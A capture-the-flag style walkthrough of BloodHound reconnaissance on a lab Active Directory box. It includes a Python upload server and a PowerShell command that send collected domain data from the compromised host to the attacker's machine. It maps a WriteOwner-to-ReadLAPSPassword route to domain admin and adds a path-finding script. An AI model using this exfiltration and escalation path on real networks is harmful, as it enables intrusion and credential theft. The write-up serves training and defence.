BloodHound


BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.

Now that I have gained a foothold on the target system, I can attempt to get BloodHound up and running.

Ingestion


A BloodHound ingestor, SharpHound, is embedded in adPEAS; the adPEAS execution already completed the ingestion.

Since lmcompatibilitylevel is set to 3, authentication is required for an SMB connection, and I don’t have the current user’s (yoshihide) password, I would need to find another way to transfer the ingested data.

┌──(kali㉿kali)-[~/archive/htb/labs/streamio]
└─$ cat post.py 
from http.server import BaseHTTPRequestHandler, HTTPServer

class MyRequestHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Read exactly the number of bytes the client declared in Content-Length
        content_length = int(self.headers['Content-Length'])
        data = self.rfile.read(content_length)
        # Write the uploaded SharpHound archive to disk under its original name
        with open('streamIO.htb_20231114111207_BloodHound.zip', 'wb') as f:
            f.write(data)
        self.send_response(200)
        self.end_headers()  # flush the status line so the client actually receives the 200

httpd = HTTPServer(('0.0.0.0', 2222), MyRequestHandler)
httpd.serve_forever()

Here is a little Python web server that supports a POST request and saves the uploaded body to a file.

PS C:\tmp> iwr -Uri 'http://10.10.16.8:2222' -Method POST -InFile streamIO.htb_20231114111207_BloodHound.zip
 
┌──(kali㉿kali)-[~/…/htb/labs/streamio/bloodhound]
└─$ python3 post.py
10.10.11.158 - - [14/Nov/2023 13:24:53] "POST / HTTP/1.1" 200 -

Transfer complete over HTTP

Prep


┌──(kali㉿kali)-[~/…/htb/labs/streamio/bloodhound]
└─$ sudo neo4j console
directories in use:
home:         /usr/share/neo4j
config:       /usr/share/neo4j/conf
logs:         /usr/share/neo4j/logs
plugins:      /usr/share/neo4j/plugins
import:       /usr/share/neo4j/import
data:         /usr/share/neo4j/data
certificates: /usr/share/neo4j/certificates
licenses:     /usr/share/neo4j/licenses
run:          /usr/share/neo4j/run
Starting Neo4j.
 
┌──(kali㉿kali)-[~/…/htb/labs/streamio/bloodhound]
└─$ bloodhound

Firing up neo4j and bloodhound

Ingested domain data has been uploaded

yoshihide


The yoshihide account doesn’t have much going on within the domain

nikk37


The nikk37 user is part of the Remote Management Users group, so the user is able to WinRM to the target system.

JDgodd


The jdgodd user has both WriteOwner and Ownership privileges over the Core Staff group. Additionally, the Core Staff group has the ReadLAPSPassword privilege over the DC host.

This appears to be the most relevant route to DA

Martin


While the martin user is a local administrator on the DC host, the user is also part of the Domain Admins group. This user appears to be pretty much out of reach.
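To make the relationships above concrete, here is an added example (not part of the original writeup and not BloodHound's or SharpHound's own code) that reads a SharpHound-style zip and answers the same question BloodHound answers in the GUI: which principals have a path to the DC host, and through which edges. It assumes the SharpHound JSON layout (a "data" list of objects with "ObjectIdentifier", "Properties", "Aces", group "Members", and computer "LocalAdmins" / "PSRemoteUsers"); the zip contents, the SIDs and the four accounts are constructed to mirror the lab description, not collected data. The same query is what a defender runs to find which low-privilege accounts have an ACL path to LAPS passwords.

```python
import io
import json
import zipfile
from collections import deque

# Constructed sample mirroring the four accounts discussed above. The layout
# follows the SharpHound JSON format as I understand it (assumption): each file
# holds a "data" list of objects with "ObjectIdentifier", "Properties",
# "Aces", and for groups "Members" / for computers "LocalAdmins" and
# "PSRemoteUsers". SIDs are placeholders, not values collected from the lab.
DOMAIN_SID = "S-1-5-21-111-222-333"  # placeholder domain SID


def sid(rid):
    return f"{DOMAIN_SID}-{rid}"


def user(rid, name):
    return {"ObjectIdentifier": sid(rid), "Properties": {"name": name}, "Aces": []}


SAMPLE_FILES = {
    "users.json": {"data": [
        user(1001, "YOSHIHIDE@STREAMIO.HTB"), user(1002, "NIKK37@STREAMIO.HTB"),
        user(1003, "JDGODD@STREAMIO.HTB"), user(1004, "MARTIN@STREAMIO.HTB")]},
    "groups.json": {"data": [
        {"ObjectIdentifier": sid(2001), "Properties": {"name": "CORE STAFF@STREAMIO.HTB"},
         "Members": [],
         "Aces": [{"PrincipalSID": sid(1003), "RightName": "WriteOwner"},
                  {"PrincipalSID": sid(1003), "RightName": "Owns"}]},
        {"ObjectIdentifier": sid(2002), "Properties": {"name": "REMOTE MANAGEMENT USERS@STREAMIO.HTB"},
         "Members": [{"ObjectIdentifier": sid(1002), "ObjectType": "User"}], "Aces": []},
        {"ObjectIdentifier": sid(2003), "Properties": {"name": "DOMAIN ADMINS@STREAMIO.HTB"},
         "Members": [{"ObjectIdentifier": sid(1004), "ObjectType": "User"}], "Aces": []}]},
    "computers.json": {"data": [
        {"ObjectIdentifier": sid(3001), "Properties": {"name": "DC.STREAMIO.HTB"},
         "Aces": [{"PrincipalSID": sid(2001), "RightName": "ReadLAPSPassword"}],
         "LocalAdmins": {"Results": [{"ObjectIdentifier": sid(1004), "ObjectType": "User"}]},
         "PSRemoteUsers": {"Results": [{"ObjectIdentifier": sid(2002), "ObjectType": "Group"}]}}]},
}


def build_zip(files):
    """Pack the sample JSON files into an in-memory zip, like the SharpHound archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in files.items():
            zf.writestr(name, json.dumps(content))
    return buf.getvalue()


def load_graph(zip_bytes):
    """Read every JSON file in the zip; return SID->name and (src, right, dst) edges."""
    names, edges = {}, []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for fname in zf.namelist():
            for obj in json.loads(zf.read(fname))["data"]:
                oid = obj["ObjectIdentifier"]
                names[oid] = obj["Properties"]["name"]
                for ace in obj.get("Aces", []):          # ACL rights held over this object
                    edges.append((ace["PrincipalSID"], ace["RightName"], oid))
                for m in obj.get("Members", []):         # group membership
                    edges.append((m["ObjectIdentifier"], "MemberOf", oid))
                for key, right in (("LocalAdmins", "AdminTo"), ("PSRemoteUsers", "CanPSRemote")):
                    for a in obj.get(key, {}).get("Results", []):
                        edges.append((a["ObjectIdentifier"], right, oid))
    return names, edges


def shortest_path(names, edges, start_name, target_name):
    """BFS from one principal to another; returns [(from, right, to), ...] or None."""
    by_name = {v: k for k, v in names.items()}
    start, target = by_name[start_name], by_name[target_name]
    adj = {}
    for src, right, dst in edges:
        adj.setdefault(src, []).append((right, dst))
    prev, queue = {start: None}, deque([start])
    while queue:
        node = queue.popleft()
        if node == target:
            break
        for right, nxt in adj.get(node, []):
            if nxt not in prev:
                prev[nxt] = (node, right)
                queue.append(nxt)
    if target not in prev:
        return None
    hops, node = [], target
    while prev[node] is not None:
        parent, right = prev[node]
        hops.append((names[parent], right, names[node]))
        node = parent
    return hops[::-1]


NAMES, EDGES = load_graph(build_zip(SAMPLE_FILES))

if __name__ == "__main__":
    for who in ("YOSHIHIDE", "NIKK37", "JDGODD", "MARTIN"):
        print(who, shortest_path(NAMES, EDGES, f"{who}@STREAMIO.HTB", "DC.STREAMIO.HTB"))
```

Running it reproduces the four observations: yoshihide has no path, nikk37 reaches the DC only through a CanPSRemote edge, jdgodd reaches it in two hops (WriteOwner over Core Staff, then ReadLAPSPassword on the DC), and martin already holds AdminTo. On a real collection the same loader works unchanged on the downloaded zip, and the BFS is the plain-graph equivalent of the shortest-path query BloodHound issues to neo4j.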